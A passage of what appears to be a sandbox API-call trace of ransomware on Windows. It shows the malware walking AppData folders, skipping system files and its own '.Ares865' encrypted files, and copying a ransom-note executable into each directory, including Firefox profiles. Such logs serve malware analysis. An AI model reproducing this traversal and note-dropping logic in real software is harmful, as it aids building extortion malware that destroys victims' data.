nFileSizeLow=0x8da0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cbSsZK4HFXH0NDh.bmp.Ares865", cAlternateFileName="CBSSZK~1.ARE")) returned 1 [0109.181] lstrcmpiW (lpString1="cbSsZK4HFXH0NDh.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.181] lstrcmpiW (lpString1="cbSsZK4HFXH0NDh.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0109.181] lstrcmpiW (lpString1="cbSsZK4HFXH0NDh.bmp.Ares865", lpString2=".") returned 1 [0109.181] lstrcmpiW (lpString1="cbSsZK4HFXH0NDh.bmp.Ares865", lpString2="..") returned 1 [0109.181] lstrcmpiW (lpString1="cbSsZK4HFXH0NDh.bmp.Ares865", lpString2="windows") returned -1 [0109.181] lstrcmpiW (lpString1="cbSsZK4HFXH0NDh.bmp.Ares865", lpString2="bootmgr") returned 1 [0109.181] lstrcmpiW (lpString1="cbSsZK4HFXH0NDh.bmp.Ares865", lpString2="temp") returned -1 [0109.181] lstrcmpiW (lpString1="cbSsZK4HFXH0NDh.bmp.Ares865", lpString2="pagefile.sys") returned -1 [0109.181] lstrcmpiW (lpString1="cbSsZK4HFXH0NDh.bmp.Ares865", lpString2="boot") returned 1 [0109.181] lstrcmpiW (lpString1="cbSsZK4HFXH0NDh.bmp.Ares865", lpString2="ids.txt") returned -1 [0109.181] lstrcmpiW (lpString1="cbSsZK4HFXH0NDh.bmp.Ares865", lpString2="ntuser.dat") returned -1 [0109.181] lstrcmpiW (lpString1="cbSsZK4HFXH0NDh.bmp.Ares865", lpString2="perflogs") returned -1 [0109.181] lstrcmpiW (lpString1="cbSsZK4HFXH0NDh.bmp.Ares865", lpString2="MSBuild") returned -1 [0109.181] lstrlenW (lpString="cbSsZK4HFXH0NDh.bmp.Ares865") returned 27 [0109.181] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\c8I0-fHNFgj2G8UmsIR.m4a.Ares865") returned 77 [0109.181] lstrcpyW (in: lpString1=0x2cce45c, lpString2="cbSsZK4HFXH0NDh.bmp.Ares865" | out: lpString1="cbSsZK4HFXH0NDh.bmp.Ares865") returned="cbSsZK4HFXH0NDh.bmp.Ares865" [0109.181] lstrlenW (lpString="cbSsZK4HFXH0NDh.bmp.Ares865") returned 27 [0109.181] lstrlenW (lpString="Ares865") returned 7 [0109.181] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0109.181] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb2ae3f0, ftCreationTime.dwHighDateTime=0x1d4d1d0, ftLastAccessTime.dwLowDateTime=0x6dcbcbb0, ftLastAccessTime.dwHighDateTime=0x1d4d148, ftLastWriteTime.dwLowDateTime=0x71d9de40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xcf10, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CNGQLjAz7s.jpg.Ares865", cAlternateFileName="CNGQLJ~1.ARE")) returned 1 [0109.181] lstrcmpiW (lpString1="CNGQLjAz7s.jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.181] lstrcmpiW (lpString1="CNGQLjAz7s.jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0109.181] lstrcmpiW (lpString1="CNGQLjAz7s.jpg.Ares865", lpString2=".") returned 1 [0109.181] lstrcmpiW (lpString1="CNGQLjAz7s.jpg.Ares865", lpString2="..") returned 1 [0109.181] lstrcmpiW (lpString1="CNGQLjAz7s.jpg.Ares865", lpString2="windows") returned -1 [0109.181] lstrcmpiW (lpString1="CNGQLjAz7s.jpg.Ares865", lpString2="bootmgr") returned 1 [0109.181] lstrcmpiW (lpString1="CNGQLjAz7s.jpg.Ares865", lpString2="temp") returned -1 [0109.181] lstrcmpiW (lpString1="CNGQLjAz7s.jpg.Ares865", lpString2="pagefile.sys") returned -1 [0109.181] lstrcmpiW (lpString1="CNGQLjAz7s.jpg.Ares865", lpString2="boot") returned 1 [0109.181] lstrcmpiW (lpString1="CNGQLjAz7s.jpg.Ares865", lpString2="ids.txt") returned -1 [0109.181] lstrcmpiW (lpString1="CNGQLjAz7s.jpg.Ares865", lpString2="ntuser.dat") returned -1 [0109.182] lstrcmpiW (lpString1="CNGQLjAz7s.jpg.Ares865", lpString2="perflogs") returned -1 [0109.182] lstrcmpiW (lpString1="CNGQLjAz7s.jpg.Ares865", lpString2="MSBuild") returned -1 [0109.182] lstrlenW (lpString="CNGQLjAz7s.jpg.Ares865") returned 22 [0109.182] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cbSsZK4HFXH0NDh.bmp.Ares865") returned 73 [0109.182] lstrcpyW (in: lpString1=0x2cce45c, lpString2="CNGQLjAz7s.jpg.Ares865" | out: lpString1="CNGQLjAz7s.jpg.Ares865") returned="CNGQLjAz7s.jpg.Ares865" [0109.182] lstrlenW (lpString="CNGQLjAz7s.jpg.Ares865") returned 22 [0109.182] lstrlenW (lpString="Ares865") returned 7 [0109.182] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0109.182] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x95895c10, ftCreationTime.dwHighDateTime=0x1d4c7cc, ftLastAccessTime.dwLowDateTime=0xba928660, ftLastAccessTime.dwHighDateTime=0x1d4d43f, ftLastWriteTime.dwLowDateTime=0x71d9de40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xcd70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D0Qh2z.mp4.Ares865", cAlternateFileName="D0QH2Z~1.ARE")) returned 1 [0109.182] lstrcmpiW (lpString1="D0Qh2z.mp4.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.182] lstrcmpiW (lpString1="D0Qh2z.mp4.Ares865", lpString2="aoldtz.exe") returned 1 [0109.182] lstrcmpiW (lpString1="D0Qh2z.mp4.Ares865", lpString2=".") returned 1 [0109.182] lstrcmpiW (lpString1="D0Qh2z.mp4.Ares865", lpString2="..") returned 1 [0109.182] lstrcmpiW (lpString1="D0Qh2z.mp4.Ares865", lpString2="windows") returned -1 [0109.182] lstrcmpiW (lpString1="D0Qh2z.mp4.Ares865", lpString2="bootmgr") returned 1 [0109.182] lstrcmpiW (lpString1="D0Qh2z.mp4.Ares865", lpString2="temp") returned -1 [0109.182] lstrcmpiW (lpString1="D0Qh2z.mp4.Ares865", lpString2="pagefile.sys") returned -1 [0109.182] lstrcmpiW (lpString1="D0Qh2z.mp4.Ares865", lpString2="boot") returned 1 [0109.182] lstrcmpiW (lpString1="D0Qh2z.mp4.Ares865", lpString2="ids.txt") returned -1 [0109.182] lstrcmpiW (lpString1="D0Qh2z.mp4.Ares865", lpString2="ntuser.dat") returned -1 [0109.182] lstrcmpiW (lpString1="D0Qh2z.mp4.Ares865", lpString2="perflogs") returned -1 [0109.182] lstrcmpiW (lpString1="D0Qh2z.mp4.Ares865", lpString2="MSBuild") returned -1 [0109.182] lstrlenW (lpString="D0Qh2z.mp4.Ares865") returned 18 [0109.182] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CNGQLjAz7s.jpg.Ares865") returned 68 [0109.182] lstrcpyW (in: lpString1=0x2cce45c, lpString2="D0Qh2z.mp4.Ares865" | out: lpString1="D0Qh2z.mp4.Ares865") returned="D0Qh2z.mp4.Ares865" [0109.182] lstrlenW (lpString="D0Qh2z.mp4.Ares865") returned 18 [0109.182] lstrlenW (lpString="Ares865") returned 7 [0109.182] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0109.182] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x39e053e0, ftCreationTime.dwHighDateTime=0x1d4cf16, ftLastAccessTime.dwLowDateTime=0xfca045c0, ftLastAccessTime.dwHighDateTime=0x1d4ce4e, ftLastWriteTime.dwLowDateTime=0x71dc3fa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x16890, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dt yAo3cNSf05bH Cx.wav.Ares865", cAlternateFileName="DTYAO3~1.ARE")) returned 1 [0109.182] lstrcmpiW (lpString1="dt yAo3cNSf05bH Cx.wav.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.182] lstrcmpiW (lpString1="dt yAo3cNSf05bH Cx.wav.Ares865", lpString2="aoldtz.exe") returned 1 [0109.182] lstrcmpiW (lpString1="dt yAo3cNSf05bH Cx.wav.Ares865", lpString2=".") returned 1 [0109.182] lstrcmpiW (lpString1="dt yAo3cNSf05bH Cx.wav.Ares865", lpString2="..") returned 1 [0109.183] lstrcmpiW (lpString1="dt yAo3cNSf05bH Cx.wav.Ares865", lpString2="windows") returned -1 [0109.183] lstrcmpiW (lpString1="dt yAo3cNSf05bH Cx.wav.Ares865", lpString2="bootmgr") returned 1 [0109.183] lstrcmpiW (lpString1="dt yAo3cNSf05bH Cx.wav.Ares865", lpString2="temp") returned -1 [0109.183] lstrcmpiW (lpString1="dt yAo3cNSf05bH Cx.wav.Ares865", lpString2="pagefile.sys") returned -1 [0109.183] lstrcmpiW (lpString1="dt yAo3cNSf05bH Cx.wav.Ares865", lpString2="boot") returned 1 [0109.183] lstrcmpiW (lpString1="dt yAo3cNSf05bH Cx.wav.Ares865", lpString2="ids.txt") returned -1 [0109.183] lstrcmpiW (lpString1="dt yAo3cNSf05bH Cx.wav.Ares865", lpString2="ntuser.dat") returned -1 [0109.183] lstrcmpiW (lpString1="dt yAo3cNSf05bH Cx.wav.Ares865", lpString2="perflogs") returned -1 [0109.183] lstrcmpiW (lpString1="dt yAo3cNSf05bH Cx.wav.Ares865", lpString2="MSBuild") returned -1 [0109.183] lstrlenW (lpString="dt yAo3cNSf05bH Cx.wav.Ares865") returned 30 [0109.183] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\D0Qh2z.mp4.Ares865") returned 64 [0109.183] lstrcpyW (in: lpString1=0x2cce45c, lpString2="dt yAo3cNSf05bH Cx.wav.Ares865" | out: lpString1="dt yAo3cNSf05bH Cx.wav.Ares865") returned="dt yAo3cNSf05bH Cx.wav.Ares865" [0109.183] lstrlenW (lpString="dt yAo3cNSf05bH Cx.wav.Ares865") returned 30 [0109.183] lstrlenW (lpString="Ares865") returned 7 [0109.183] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0109.183] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd4876800, ftCreationTime.dwHighDateTime=0x1d4c74d, ftLastAccessTime.dwLowDateTime=0x4bf9a930, ftLastAccessTime.dwHighDateTime=0x1d4c685, ftLastWriteTime.dwLowDateTime=0x71dc3fa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xe830, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GQ4zc9V.png.Ares865", cAlternateFileName="GQ4ZC9~1.ARE")) returned 1 [0109.183] lstrcmpiW (lpString1="GQ4zc9V.png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.183] lstrcmpiW (lpString1="GQ4zc9V.png.Ares865", lpString2="aoldtz.exe") returned 1 [0109.183] lstrcmpiW (lpString1="GQ4zc9V.png.Ares865", lpString2=".") returned 1 [0109.183] lstrcmpiW (lpString1="GQ4zc9V.png.Ares865", lpString2="..") returned 1 [0109.183] lstrcmpiW (lpString1="GQ4zc9V.png.Ares865", lpString2="windows") returned -1 [0109.183] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla" [0109.183] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0109.183] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0109.184] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla") returned 53 [0109.184] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla" [0109.184] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.184] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.184] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.185] GetLastError () returned 0x0 [0109.185] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.185] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.185] CloseHandle (hObject=0x120) returned 1 [0109.185] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.185] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.185] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x50145c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50145c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.185] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.185] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.185] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox" [0109.185] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0109.185] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0109.185] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox") returned 61 [0109.185] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox" [0109.185] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.185] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.186] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.186] GetLastError () returned 0x0 [0109.186] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.186] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.186] CloseHandle (hObject=0x120) returned 1 [0109.186] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.186] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.186] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x71f40d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x71f40d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.187] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.187] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.187] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0109.187] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0109.187] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0109.187] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 70 [0109.187] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0109.187] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.187] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.188] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.188] GetLastError () returned 0x0 [0109.188] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.188] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.188] CloseHandle (hObject=0x120) returned 1 [0109.188] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.188] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.188] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x50145c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50145c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.188] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.188] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.188] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0109.189] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8890 | out: hHeap=0x2b0000) returned 1 [0109.189] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0109.189] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0109.189] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0109.189] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.189] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.189] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.190] GetLastError () returned 0x0 [0109.190] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.190] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.190] CloseHandle (hObject=0x120) returned 1 [0109.190] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.190] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.190] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x720255a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x720255a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.190] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.190] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.190] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0109.190] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0109.190] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0109.190] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned 95 [0109.190] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0109.190] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.190] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how 